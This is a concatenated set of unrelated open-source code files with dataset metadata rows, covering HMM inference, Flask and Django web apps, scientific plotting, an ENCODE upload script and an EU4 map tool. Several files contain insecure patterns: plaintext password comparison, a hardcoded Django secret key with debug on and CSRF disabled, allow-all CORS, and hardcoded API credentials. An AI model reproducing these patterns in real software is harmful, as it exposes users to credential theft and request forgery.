def permute_cols(perm, mat):
return [[r[i] for i in perm] for r in mat]
def hmm_parameters_dist(tms1, tms2):
(tm1, om1) = tms1
(tm2, om2) = tms2
perms_and_dists = []
for perm in itertools.permutations(range(len(tm1))):
tm2p = permute_rows(perm, permute_cols(perm, tm2))
om2p = permute_rows(perm, om2)
perms_and_dists.append((perm, matrix_dist(tm1, tm2p) + matrix_dist(om1, om2p)))
return min(perms_and_dists, key=lambda x: x[1])
def run_hmm_example(run):
global current_graph_state
n = 100
accs = []
for i in range(1):
current_graph_state = GraphState()
sampler = run()
samples = [sampler() for i in range(n)]
templ = current_graph_state.to_JSON()
rand_params = hs_rand_template_params(templ)
rand_hmm = hmm_parameters(rand_params)
print rand_hmm
# rand_mat = params_to_matrix(rand_params)
varvals = state_to_varvals(hs_sample_bayes_net(templ, rand_params))
frozen_samples = [freeze_value(samp, varvals) for samp in samples]
true_latents = [x[0] for x in frozen_samples]
# print true_latents
templ = condition_on_frozen_samples(current_graph_state, samples, [x[1] for x in frozen_samples])
print 'best score', params_score(templ, rand_params)
state_params_list = infer_states_and_parameters(templ)
# rand_cs = params_to_cluster_centers(rand_params)
iter_accs = []
j = 0
prev_state_latents = None
for (state, params, score) in state_params_list:
print 'score', score
# guess_mat = params_to_matrix(params)
# cs = params_to_cluster_centers(params)
if j > 1:
inferred_hmm = hmm_parameters(params)
print inferred_hmm
print hmm_parameters_dist(rand_hmm, inferred_hmm)
varvals = state_to_varvals(state)
state_latents = [freeze_value(samp[0], varvals) for samp in samples]
prev_state_latents = state_latents
j += 1
# accs.append(iter_accs)
# print map(mean, zip(*accs))
|
mit
| 7,413,421,166,586,676,000
| 28.176883
| 155
| 0.635954
| false
| 2.904969
| false
| false
| false
|
agilman/flask-template
|
app/auth.py
|
1
|
1738
|
from flask import session, redirect, request, render_template
from app import app
from app.models import *
def getUserFromDb(username,password):
userQuery = Users.query.filter_by(username=username)
if userQuery.count()==0:
return "No such user"
else:
usr = userQuery.first()
if usr.passwordHash==password:
return usr
else:
return "Login failed"
@app.route("/auth/login",methods=["GET","POST"])
def login():
form = request.form
if request.method=="POST":
username = form["username"]
password = form["password"]
dbUser = getUserFromDb(username,password)
if type(dbUser) is str:
return "MSG : BAD LOG IN"
session['userName']=username
session['userId']=dbUser.id
return redirect("/users/"+username)
else:
return render_template("login.html")
@app.route("/auth/register",methods=["GET","POST"])
def register(username=None):
form = request.form
#TODO:
#Make sure unique constraint is satisfied before trying to add to db
if request.method=="POST":
username = form["username"]
password = form["password"]
email = form["email"]
user = Users(username=username, email=email, password=password)
db.session.add(user)
db.session.commit()
session['userName'] = username
session['userId'] = user.id
return redirect("/users/"+username)
else:
return render_template("register.html")
@app.route("/auth/logout")
def logout():
session.pop('userName', None)
session.pop('userId', None)
session.clear()
return redirect("/")
|
mit
| -1,983,810,625,785,931,800
| 25.738462
| 72
| 0.600115
| false
| 4.157895
| false
| false
| false
|
NoneGroupTeam/Let-s-Go
|
webapp/webapp/settings.py
|
1
|
3246
|
"""
Django settings for webapp project.
Generated by 'django-admin startproject' using Django 1.9.9.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'fopfdg5g999+e8&sk39q(%unup0d_b_e#p$jeq#qhw27d=v0#t'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['localhost',
'127.0.0.1',
'none.lc4t.me',
'letsgo.lc4t.me'
]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'app',
'corsheaders',
]
MIDDLEWARE_CLASSES = [
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
# 'django.middleware.csrf.CsrfViewMiddleware',
# 'corsheaders.middleware.CorsPostCsrfMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
CORS_ORIGIN_ALLOW_ALL = True
SESSION_COOKIE_DOMAIN = 'localhost'
# SESSION_COOKIE_HTTPONLY = False
ROOT_URLCONF = 'webapp.urls'
AUTH_USER_MODEL = "app.AppUser"
# AUTH_PROFILE_MODULE = 'app.Profile'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'webapp.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'db.sqlite3'
},
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'zh-Hans'
TIME_ZONE = 'Asia/Chongqing'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
TEST_RUNNER = 'webapp.runner.PytestTestRunner'
|
gpl-3.0
| 7,738,174,100,558,951,000
| 27.725664
| 78
| 0.687616
| false
| 3.453191
| false
| false
| false
|
ENCODE-DCC/pyencoded-tools
|
permissions_qa_scripts/originals/UPLOADS/submit.bam.py
|
1
|
4935
|
""" Example file submission script
Requires the `aws` command line utility: http://aws.amazon.com/cli/
"""
import hashlib
import json
import os
import requests
import subprocess
import sys
import time
host = 'REPLACEME'
encoded_access_key = 'UISQC32B'
encoded_secret_access_key = 'ikc2wbs27minvwo4'
path = 'test.bam'
my_lab = '/labs/thomas-gingeras/'
my_award = '/awards/U54HG004557/'
# From http://hgwdev.cse.ucsc.edu/~galt/encode3/validatePackage/validateEncode3-latest.tgz
encValData = 'encValData'
assembly = 'hg19'
# ~2s/GB
print("Calculating md5sum.")
md5sum = hashlib.md5()
with open(path, 'rb') as f:
for chunk in iter(lambda: f.read(1024*1024), b''):
md5sum.update(chunk)
data = {
"dataset": "TSTNEW",
"file_format": "bam",
"file_size": os.path.getsize(path),
"assembly": "hg19",
"md5sum": md5sum.hexdigest(),
"output_type": "alignments",
"submitted_file_name": path,
"lab": my_lab,
"award": my_award,
}
####################
# Local validation
gzip_types = [
"CEL",
"bam",
"bed",
"csfasta",
"csqual",
"fasta",
"fastq",
"gff",
"gtf",
"tar",
"sam",
"wig"
]
magic_number = open(path, 'rb').read(2)
is_gzipped = magic_number == b'\x1f\x8b'
if data['file_format'] in gzip_types:
assert is_gzipped, 'Expected gzipped file'
else:
assert not is_gzipped, 'Expected un-gzipped file'
chromInfo = '-chromInfo=%s/%s/chrom.sizes' % (encValData, assembly)
validate_map = {
('bam', None): ['-type=bam', chromInfo],
('bed', 'unknown'): ['-type=bed6+', chromInfo], # if this fails we will drop to bed3+
('bigBed', 'bedLogR'): ['-type=bigBed9+1', chromInfo, '-as=%s/as/bedLogR.as' % encValData],
('bed', 'bedLogR'): ['-type=bed9+1', chromInfo, '-as=%s/as/bedLogR.as' % encValData],
('bigBed', 'bedMethyl'): ['-type=bigBed9+2', chromInfo, '-as=%s/as/bedMethyl.as' % encValData],
('bed', 'bedMethyl'): ['-type=bed9+2', chromInfo, '-as=%s/as/bedMethyl.as' % encValData],
('bigBed', 'unknown'): ['-type=bigBed6+', chromInfo], # if this fails we will drop to bigBed3+
('bigWig', None): ['-type=bigWig', chromInfo],
('bigBed', 'broadPeak'): ['-type=bigBed6+3', chromInfo, '-as=%s/as/broadPeak.as' % encValData],
('bed', 'broadPeak'): ['-type=bed6+3', chromInfo, '-as=%s/as/broadPeak.as' % encValData],
('fasta', None): ['-type=fasta'],
('fastq', None): ['-type=fastq'],
('bigBed', 'gappedPeak'): ['-type=bigBed12+3', chromInfo, '-as=%s/as/gappedPeak.as' % encValData],
('bed', 'gappedPeak'): ['-type=bed12+3', chromInfo, '-as=%s/as/gappedPeak.as' % encValData],
('gtf', None): None,
('idat', None): ['-type=idat'],
('bigBed', 'narrowPeak'): ['-type=bigBed6+4', chromInfo, '-as=%s/as/narrowPeak.as' % encValData],
('bed', 'narrowPeak'): ['-type=bed6+4', chromInfo, '-as=%s/as/narrowPeak.as' % encValData],
('rcc', None): ['-type=rcc'],
('tar', None): None,
('tsv', None): None,
('csv', None): None,
('2bit', None): None,
('csfasta', None): ['-type=csfasta'],
('csqual', None): ['-type=csqual'],
('bigBed', 'bedRnaElements'): ['-type=bed6+3', chromInfo, '-as=%s/as/bedRnaElements.as' % encValData],
('CEL', None): None,
('sam', None): None,
('wig', None): None,
('hdf5', None): None,
('gff', None): None
}
validate_args = validate_map.get((data['file_format'], data.get('file_format_type')))
if validate_args is not None:
print("Validating file.")
try:
subprocess.check_output(['validateFiles'] + validate_args + [path])
except subprocess.CalledProcessError as e:
print(e.output)
raise
####################
# POST metadata
headers = {
'Content-type': 'application/json',
'Accept': 'application/json',
}
print("Submitting metadata.")
r = requests.post(
host + '/file',
auth=(encoded_access_key, encoded_secret_access_key),
data=json.dumps(data),
headers=headers,
)
try:
r.raise_for_status()
except:
print('Submission failed: %s %s' % (r.status_code, r.reason))
print(r.text)
raise
item = r.json()['@graph'][0]
print(json.dumps(item, indent=4, sort_keys=True))
####################
# POST file to S3
creds = item['upload_credentials']
env = os.environ.copy()
env.update({
'AWS_ACCESS_KEY_ID': creds['access_key'],
'AWS_SECRET_ACCESS_KEY': creds['secret_key'],
'AWS_SECURITY_TOKEN': creds['session_token'],
})
# ~10s/GB from Stanford - AWS Oregon
# ~12-15s/GB from AWS Ireland - AWS Oregon
print("Uploading file.")
start = time.time()
try:
subprocess.check_call(['aws', 's3', 'cp', path, creds['upload_url']], env=env)
except subprocess.CalledProcessError as e:
# The aws command returns a non-zero exit code on error.
print("Upload failed with exit code %d" % e.returncode)
sys.exit(e.returncode)
else:
end = time.time()
duration = end - start
print("Uploaded in %.2f seconds" % duration)
|
mit
| 467,417,177,298,291,700
| 29.091463
| 106
| 0.611145
| false
| 2.867519
| false
| false
| false
|
novafloss/django-agnocomplete
|
demo/tests/test_errors.py
|
1
|
4942
|
from django.test import TestCase
from django.urls import reverse
from django.test import override_settings
from django.core.exceptions import SuspiciousOperation
import mock
from requests.exceptions import Timeout
from agnocomplete import get_namespace
from . import get_json
from . import LoaddataLiveTestCase
from ..autocomplete import (
# Classic search
AutocompletePerson,
# URL Proxies
AutocompleteUrlSimpleAuth,
AutocompleteUrlHeadersAuth,
)
def raise_standard_exception(*args, **kwargs):
raise Exception("Nothing exceptional")
def raise_suspiciousoperation(*args, **kwargs):
raise SuspiciousOperation("You are not allowed to do this")
def raise_timeout(*args, **kwargs):
raise Timeout("Timeout")
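# Shared test mixin: concrete subclasses supply `klass` (the autocomplete class
# under test) and `mock_function` (the exception to raise); test_errors patches
# the autocomplete's `items` attribute with that function and checks the view
# answers with `expected_status` and a single entry under "errors".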
class ErrorHandlingTest(object):
expected_status = 500
@property
def klass(self):
raise NotImplementedError("You need a `klass` property")
@property
def mock_function(self):
raise NotImplementedError("You need a `mock_function` property")
@property
def klass_path(self):
return '{}.{}'.format(self.klass.__module__, self.klass.__name__)
@property
def mock_path(self):
paths = [self.klass_path, 'items']
return ".".join(paths)
@property
def url(self):
ac_url_name = get_namespace() + ':agnocomplete'
return reverse(ac_url_name, args=[self.klass.__name__])
def test_errors(self):
with mock.patch(self.mock_path, self.mock_function):
response = self.client.get(
self.url,
data={"q": "nothing important"})
self.assertEqual(response.status_code, self.expected_status)
data = get_json(response, 'errors')
self.assertEqual(len(data), 1)
class ErrorHandlingAutocompletePersonTest(ErrorHandlingTest, TestCase):
klass = AutocompletePerson
mock_function = raise_standard_exception
class ErrorHandlingSuspiciousOperationTest(ErrorHandlingTest, TestCase):
klass = AutocompletePerson
mock_function = raise_suspiciousoperation
expected_status = 400
@override_settings(HTTP_HOST='')
class ErrorHandlingURLProxySimpleAuthTest(
ErrorHandlingTest, LoaddataLiveTestCase):
klass = AutocompleteUrlSimpleAuth
mock_function = raise_standard_exception
def test_search_query_wrong_auth(self):
# URL construct
instance = self.klass()
search_url = instance.search_url
klass = self.klass_path
with mock.patch(klass + '.get_search_url') as mock_auto:
mock_auto.return_value = self.live_server_url + search_url
# Search using the URL proxy view
search_url = get_namespace() + ':agnocomplete'
with mock.patch(klass + '.get_http_call_kwargs') as mock_headers:
mock_headers.return_value = {
'auth_token': 'BADAUTHTOKEN',
'q': 'person',
}
response = self.client.get(
reverse(
search_url, args=[self.klass.__name__]),
data={'q': "person"}
)
self.assertEqual(response.status_code, 403)
@override_settings(HTTP_HOST='')
class ErrorHandlingURLProxyHeadersAuthTest(
ErrorHandlingTest, LoaddataLiveTestCase):
klass = AutocompleteUrlHeadersAuth
mock_function = raise_standard_exception
def test_search_headers_wrong_auth(self):
# URL construct
instance = self.klass()
search_url = instance.search_url
klass = self.klass_path
with mock.patch(klass + '.get_search_url') as mock_auto:
mock_auto.return_value = self.live_server_url + search_url
# Search using the URL proxy view
search_url = get_namespace() + ':agnocomplete'
with mock.patch(klass + '.get_http_headers') as mock_headers:
mock_headers.return_value = {
'NOTHING': 'HERE'
}
response = self.client.get(
reverse(
search_url, args=[self.klass.__name__]),
data={'q': "person"}
)
self.assertEqual(response.status_code, 403)
@override_settings(HTTP_HOST='')
class ErrorHandlingURLProxyTimeoutTest(LoaddataLiveTestCase):
klass = AutocompleteUrlHeadersAuth
@property
def klass_path(self):
return '{}.{}'.format(self.klass.__module__, self.klass.__name__)
def test_timeout(self):
# Search using the URL proxy view
search_url = get_namespace() + ':agnocomplete'
with mock.patch('requests.get', raise_timeout):
response = self.client.get(
reverse(
search_url, args=[self.klass.__name__]),
data={'q': "person"}
)
self.assertEqual(response.status_code, 408)
|
mit
| 7,850,101,734,890,066,000
| 31.300654
| 77
| 0.616754
| false
| 4.223932
| true
| false
| false
|
gabinetedigital/videre
|
videos/models.py
|
1
|
2845
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011 Governo do Estado do Rio Grande do Sul
# Copyright (C) 2011 Lincoln de Sousa <lincoln@comum.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from datetime import datetime
from django.db import models
from django.utils.translation import ugettext_lazy as _
class Tag(models.Model):
name = models.CharField(_(u'name'), max_length=300)
def __unicode__(self):
return self.name
class Url(models.Model):
url = models.CharField(_(u'url'), max_length=300)
content_type = models.CharField(_(u'content type'), max_length=128)
video = models.ForeignKey('Video', verbose_name=_(u'video'))
def __unicode__(self):
return self.url
class Video(models.Model):
title = models.CharField(_(u'title'), max_length=200)
creation_date = models.DateTimeField(
_(u'creation date'), default=datetime.now)
event_date = models.DateTimeField(_(u'event date'), blank=True, null=True)
summary = models.TextField(_(u'summary'),)
author = models.CharField(_(u'author'), max_length=200)
license_name = models.CharField(_(u'license name'), max_length=200)
license_link = models.CharField(_(u'license link'), max_length=300)
thumb_url = models.CharField(_(u'thumb url'), max_length=300, blank=True)
tags = models.ManyToManyField('Tag', verbose_name=_(u'tags'),)
def __unicode__(self):
return self.title
def as_dict(self):
""" Returns a dictionary representation of a video object """
date_handler = lambda x: getattr(x, 'isoformat', lambda:None)()
return {
'id': self.id,
'title': self.title,
'creation_date': date_handler(self.creation_date),
'event_date': date_handler(self.event_date),
'summary': self.summary,
'author': self.author,
'license_name': self.license_name,
'license_link': self.license_link,
'thumb_url': self.thumb_url,
'tags': list(self.tags.values_list('name', flat=True)),
'sources': [{
'url': i.url,
'content_type': i.content_type,
} for i in self.url_set.all()],
}
|
agpl-3.0
| 8,764,051,673,740,353,000
| 38.513889
| 78
| 0.643234
| false
| 3.808568
| false
| false
| false
|
pacificgilly1992/PGrainrate
|
Backups/Externals/externals1.0.5.py
|
1
|
4428
|
############################################################################
# Project: The Lenard effect of preciptation at the RUAO,
# Title: Ensemble processing of the PG, Time and Rain Rate data,
# Author: James Gilmore,
# Email: james.gilmore@pgr.reading.ac.uk.
# Version: 1.0.5
# Date: 07/12/15
############################################################################
#Initialising the python script
from __future__ import absolute_import, division, print_function
import matplotlib.pyplot as plt
import numpy as np
from lowess import lowess
import sys
############################################################################
#Plotting functions for PG and Rain Rate
def PGRainFull(xlimmax=None, ylimmax=None, outFile=None, fileformat=None, RainRate5mm=None, TimeTip5mm=None, timekeep=None, PG=None, PGtip=None, slope=None, intercept=None, p_value=None, r_value=None, pearson_cor=None, std_err=None, mann_wht=None):
"Plot 3 subplots all of which completment the main focus, i.e. (1) PG vs."
"Rain Rate along with side plots for (2) Rain Rate and (3) PG between the"
"times that charged rain was detected. Statistical information was also "
"added in the remaining quadrant to fill the white space but can easily "
"be removed if neseccary."
plt.clf()
fig = plt.figure()
#plt.suptitle("Raindrop Charge: " + outFile)
pgrain = fig.add_subplot(222)
pgrain.scatter(RainRate5mm, PGtip)
pgrain.set_xlabel("Rain Rate (mm/hr)")
pgrain.set_ylabel("Potential Gradient (V/m)")
pgrain.grid()
pgrain.set_xlim(-.1,xlimmax)
pgrain.set_ylim(-1050, ylimmax)
pgrain.invert_yaxis()
pgrain.plot(np.arange(-.1, xlimmax+0.3, 0.2),np.arange(-.1, xlimmax+0.3, 0.2)*slope+intercept)
PGRainsort = np.array(sorted(zip(RainRate5mm, PGtip)))
eps = sys.float_info.epsilon
pgrain.plot(PGRainsort[:,0], lowess(PGRainsort[:,0]+eps, PGRainsort[:,1]+eps, 1/2))
x0, x1 = pgrain.get_xlim()
y0, y1 = pgrain.get_ylim()
pgrain.set_aspect(np.abs((x1-x0)/(y1-y0)))
#PG Plot
pg = fig.add_subplot(221)
pg.plot(timekeep,PG)
pg.set_xlabel("Time (hrs)")
pg.set_xlim(np.min(TimeTip5mm),np.max(TimeTip5mm))
pg.set_ylim(-1050, ylimmax)
pg.invert_yaxis()
#pg.axes.get_yaxis().set_visible(False)
pg.grid()
x0, x1 = pg.get_xlim()
y0, y1 = pg.get_ylim()
pg.set_aspect(np.abs((x1-x0)/(y1-y0)))
#Rain plot
rain = fig.add_subplot(224)
rain.plot(RainRate5mm,TimeTip5mm)
rain.set_ylabel("Time (hrs)")
rain.set_ylim(np.min(TimeTip5mm),np.max(TimeTip5mm))
rain.set_xlim(-.1,xlimmax)
rain.grid()
x0, x1 = rain.get_xlim()
y0, y1 = rain.get_ylim()
rain.set_aspect(np.abs((x1-x0)/(y1-y0)))
#Info Plot
info = fig.add_subplot(223)
info.axis('off')
info.text(-0.1, .9, '$Year and Day$', fontsize=15)
info.text(-0.1, .75, '$P-Value$: ', fontsize=15)
info.text(-0.1, .6, '$R^2$: ', fontsize=15)
info.text(-0.1, .45, "$Pearson's Cor$: ", fontsize=15)
info.text(-0.1, .3, "$Standard Error$: ", fontsize=15)
info.text(-0.1, .15, "$Mann-Whitney$: ", fontsize=15)
info.text(0.6, .9, outFile, fontsize=15)
info.text(0.6, .75, round(p_value,7), fontsize=15)
info.text(0.6, .6, round(r_value**2,5), fontsize=15)
info.text(0.6, .45, round(pearson_cor[1],5), fontsize=15)
info.text(0.6, .3, round(std_err,5), fontsize=15)
info.text(0.6, .15, round(mann_wht,5), fontsize=15)
x0, x1 = info.get_xlim()
y0, y1 = info.get_ylim()
info.set_aspect(np.abs((x1-x0)/(y1-y0)))
plt.tight_layout(pad=0.4, w_pad=-0.5, h_pad=0.5)
plt.savefig('plots/new/' + outFile + "." + fileformat)
plt.close(fig)
def PGRainSlim(xlimmax=None, ylimmax=None, outFile=None, fileformat=None, RainRate5mm=None, PGtip=None, slope=None, intercept=None):
plt.clf()
fig = plt.figure()
#plt.suptitle("Raindrop Charge: " + outFile)
pgrain = fig.add_subplot(111)
pgrain.scatter(RainRate5mm, PGtip)
pgrain.set_xlabel("Rain Rate (mm/hr)")
pgrain.set_ylabel("Potential Gradient (V/m)")
pgrain.grid()
pgrain.set_xlim(-.1,xlimmax)
pgrain.set_ylim(-200, ylimmax)
pgrain.invert_yaxis()
#pgrain.plot(np.arange(-.1, xlimmax+0.3, 0.2),np.arange(-.1, xlimmax+0.3, 0.2)*slope+intercept)
PGRainsort = np.array(sorted(zip(RainRate5mm, PGtip)))
eps = sys.float_info.epsilon
pgrain.plot(PGRainsort[:,0], lowess(PGRainsort[:,0]+eps, PGRainsort[:,1]+eps, 1/2))
x0, x1 = pgrain.get_xlim()
y0, y1 = pgrain.get_ylim()
pgrain.set_aspect(np.abs((x1-x0)/(y1-y0)))
plt.savefig('plots/new/' + outFile + "." + fileformat)
plt.close(fig)
|
gpl-3.0
| -4,713,461,817,470,815,000
| 31.8
| 248
| 0.648374
| false
| 2.397401
| false
| false
| false
|
javierLiarte/tdd-goat-python
|
tests/selenium/conftest.py
|
1
|
1089
|
import pytest
import os
from selenium import webdriver
browsers = {
'firefox': webdriver.Firefox,
'chrome': webdriver.Chrome,
}
@pytest.fixture(scope='session', params=browsers.keys())
def driver(request):
''' driver factory, for allowing more than one browser object in a fixture '''
if 'DISPLAY' not in os.environ:
pytest.skip('Test requires display server (export DISPLAY)')
class DriverFactory(object):
def get(self):
b = browsers[request.param]()
request.addfinalizer(lambda *args: b.quit())
return b
return DriverFactory()
@pytest.fixture
def bf(driver, url):
''' browser factory, for allowing more than one browser object in a fixture '''
class BrowserFactory(object):
def get(self):
b = driver.get()
b.set_window_size(1200, 800)
b.implicitly_wait(3)
b.get(url)
return b
return BrowserFactory()
def pytest_addoption(parser):
parser.addoption('--url', action='store',
default='http://localhost:8111/')
@pytest.fixture(scope='session')
def url(request):
return request.config.option.url
|
gpl-2.0
| -5,603,045,507,090,966,000
| 25.585366
| 81
| 0.68595
| false
| 3.768166
| true
| false
| false
|
zijistark/ck2utils
|
esc/eu4culture_map.py
|
1
|
4853
|
#!/usr/bin/env python3
from collections import defaultdict
import math
from pathlib import Path
import re
import sys
import urllib.request
import numpy as np
from PIL import Image
import spectra
from ck2parser import rootpath, csv_rows, SimpleParser, Obj
from localpaths import eu4dir
from print_time import print_time
@print_time
def main():
parser = SimpleParser()
parser.basedir = eu4dir
if len(sys.argv) > 1:
parser.moddirs.append(Path(sys.argv[1]))
rgb_number_map = {}
default_tree = parser.parse_file('map/default.map')
provinces_path = parser.file('map/' + default_tree['provinces'].val)
climate_path = parser.file('map/' + default_tree['climate'].val)
max_provinces = default_tree['max_provinces'].val
colors = {
'land': np.uint8((127, 127, 127)),
'sea': np.uint8((68, 107, 163)),
'desert': np.uint8((94, 94, 94))
}
prov_color_lut = np.empty(max_provinces, '3u1')
for row in csv_rows(parser.file('map/' + default_tree['definitions'].val)):
try:
number = int(row[0])
except ValueError:
continue
if number < max_provinces:
rgb = tuple(np.uint8(row[1:4]))
rgb_number_map[rgb] = np.uint16(number)
grouped_cultures = []
for _, tree in parser.parse_files('common/cultures/*'):
for n, v in tree:
cultures = []
for n2, v2 in v:
if (isinstance(v2, Obj) and
not re.match(r'((fe)?male|dynasty)_names', n2.val)):
cultures.append(n2.val)
grouped_cultures.append(cultures)
region_colors = []
for _, tree in parser.parse_files('common/region_colors/*'):
for n, v in tree:
region_colors.append(spectra.rgb(*(n2.val / 255 for n2 in v)))
culture_color = {'noculture': colors['land']}
spherical_code = {
1: [(0, 0, 1)],
2: [(0, 0, 1), (0, 0, -1)],
3: [(1, 0, 0), (-1 / 2, math.sqrt(3) / 2, 0),
(-1 / 2, -math.sqrt(3) / 2, 0)]
}
out_of_gamut = 0
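    # Each culture group keeps its region colour; individual cultures are offset
    # from it in Lab space along well-separated unit-sphere directions (Sloane's
    # sphere packings, fetched and cached for group sizes not listed above).
    # Colours that fall outside the sRGB gamut are clamped and counted.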
for i, cultures in enumerate(grouped_cultures):
group_color = region_colors[i + 1].to('lab').values
num_cultures = len(cultures)
try:
code = spherical_code[num_cultures]
except KeyError:
url_fmt = 'http://neilsloane.com/packings/dim3/pack.3.{}.txt'
url = url_fmt.format(num_cultures)
with urllib.request.urlopen(url) as response:
txt = response.read()
floats = [float(x) for x in txt.split()]
code = list(zip(*[iter(floats)]*3))
spherical_code[num_cultures] = code
for culture, coords in zip(cultures, code):
offset_lab = [a + b * 14 for a, b in zip(group_color, coords)]
color = spectra.lab(*offset_lab)
if color.rgb != color.clamped_rgb:
out_of_gamut += 1
upscaled = [round(x * 255) for x in color.clamped_rgb]
culture_color[culture] = np.uint8(upscaled)
culture_count = sum(len(x) for x in grouped_cultures)
print('Out of gamut: {:.2%}'.format(out_of_gamut / culture_count),
file=sys.stderr)
for path in parser.files('history/provinces/*'):
match = re.match(r'\d+', path.stem)
if not match:
continue
number = int(match.group())
if number >= max_provinces:
continue
properties = {'culture': 'noculture'}
history = defaultdict(list)
for n, v in parser.parse_file(path):
if n.val in properties:
properties[n.val] = v.val
elif isinstance(n.val, tuple) and n.val <= (1444, 11, 11):
history[n.val].extend((n2.val, v2.val) for n2, v2 in v
if n2.val in properties)
properties.update(p2 for _, v in sorted(history.items()) for p2 in v)
prov_color_lut[number] = culture_color[properties['culture']]
for n in parser.parse_file(climate_path)['impassable']:
prov_color_lut[int(n.val)] = colors['desert']
for n in default_tree['sea_starts']:
prov_color_lut[int(n.val)] = colors['sea']
for n in default_tree['lakes']:
prov_color_lut[int(n.val)] = colors['sea']
image = Image.open(str(provinces_path))
a = np.array(image).view('u1,u1,u1')[..., 0]
b = np.vectorize(lambda x: rgb_number_map[tuple(x)], otypes=[np.uint16])(a)
mod = parser.moddirs[0].name.lower() + '_' if parser.moddirs else ''
borders_path = rootpath / (mod + 'eu4borderlayer.png')
borders = Image.open(str(borders_path))
out = Image.fromarray(prov_color_lut[b])
out.paste(borders, mask=borders)
out_path = rootpath / (mod + 'eu4culture_map.png')
out.save(str(out_path))
if __name__ == '__main__':
main()
|
gpl-2.0
| 2,957,810,107,190,530,600
| 37.212598
| 79
| 0.571605
| false
| 3.194865
| false
| false
| false
|
cgwire/zou
|
zou/app/blueprints/playlists/resources.py
|
1
|
9428
|
import slugify
from flask import request, send_file as flask_send_file
from flask_restful import Resource
from flask_jwt_extended import jwt_required
from zou.app import config
from zou.app.mixin import ArgsMixin
from zou.app.utils import permissions
from zou.app.services import (
entities_service,
playlists_service,
persons_service,
preview_files_service,
projects_service,
shots_service,
user_service,
)
from zou.app.stores import file_store, queue_store
from zou.app.utils import fs
from zou.utils.movie import EncodingParameters
class ProjectPlaylistsResource(Resource, ArgsMixin):
"""
Retrieve all playlists related to given project. Result is paginated and
can be sorted.
"""
@jwt_required
def get(self, project_id):
user_service.block_access_to_vendor()
user_service.check_project_access(project_id)
page = self.get_page()
sort_by = self.get_sort_by()
task_type_id = self.get_text_parameter("task_type_id")
return playlists_service.all_playlists_for_project(
project_id,
for_client=permissions.has_client_permissions(),
page=page,
sort_by=sort_by,
task_type_id=task_type_id
)
class EpisodePlaylistsResource(Resource, ArgsMixin):
"""
Retrieve all playlists related to given episode. The full list is returned
because the number of playlists in an episode is not that big.
"""
@jwt_required
def get(self, project_id, episode_id):
user_service.block_access_to_vendor()
user_service.check_project_access(project_id)
sort_by = self.get_sort_by()
task_type_id = self.get_text_parameter("task_type_id")
if episode_id not in ["main", "all"]:
shots_service.get_episode(episode_id)
return playlists_service.all_playlists_for_episode(
project_id,
episode_id,
permissions.has_client_permissions(),
sort_by=sort_by,
task_type_id=task_type_id,
)
class ProjectPlaylistResource(Resource):
@jwt_required
def get(self, project_id, playlist_id):
user_service.block_access_to_vendor()
user_service.check_project_access(project_id)
return playlists_service.get_playlist_with_preview_file_revisions(
playlist_id
)
class EntityPreviewsResource(Resource):
@jwt_required
def get(self, entity_id):
"""
Retrieve all previews related to a given entity. It sends them
        as a dict. Keys are related task type ids and values are arrays
        of previews for this task type.
"""
entity = entities_service.get_entity(entity_id)
user_service.check_project_access(entity["project_id"])
return playlists_service.get_preview_files_for_entity(entity_id)
class PlaylistDownloadResource(Resource):
@jwt_required
def get(self, playlist_id, build_job_id):
playlist = playlists_service.get_playlist(playlist_id)
project = projects_service.get_project(playlist["project_id"])
build_job = playlists_service.get_build_job(build_job_id)
user_service.check_project_access(playlist["project_id"])
if build_job["status"] != "succeeded":
return {"error": True, "message": "Build is not finished"}, 400
else:
movie_file_path = fs.get_file_path(
config,
file_store.get_local_movie_path,
file_store.open_movie,
"playlists",
build_job_id,
"mp4",
)
context_name = slugify.slugify(project["name"], separator="_")
if project["production_type"] == "tvshow":
episode_id = playlist["episode_id"]
if episode_id is not None:
episode = shots_service.get_episode(playlist["episode_id"])
episode_name = episode["name"]
elif playlist["is_for_all"]:
episode_name = "all assets"
else:
episode_name = "main pack"
context_name += "_%s" % slugify.slugify(
episode_name, separator="_"
)
attachment_filename = "%s_%s_%s.mp4" % (
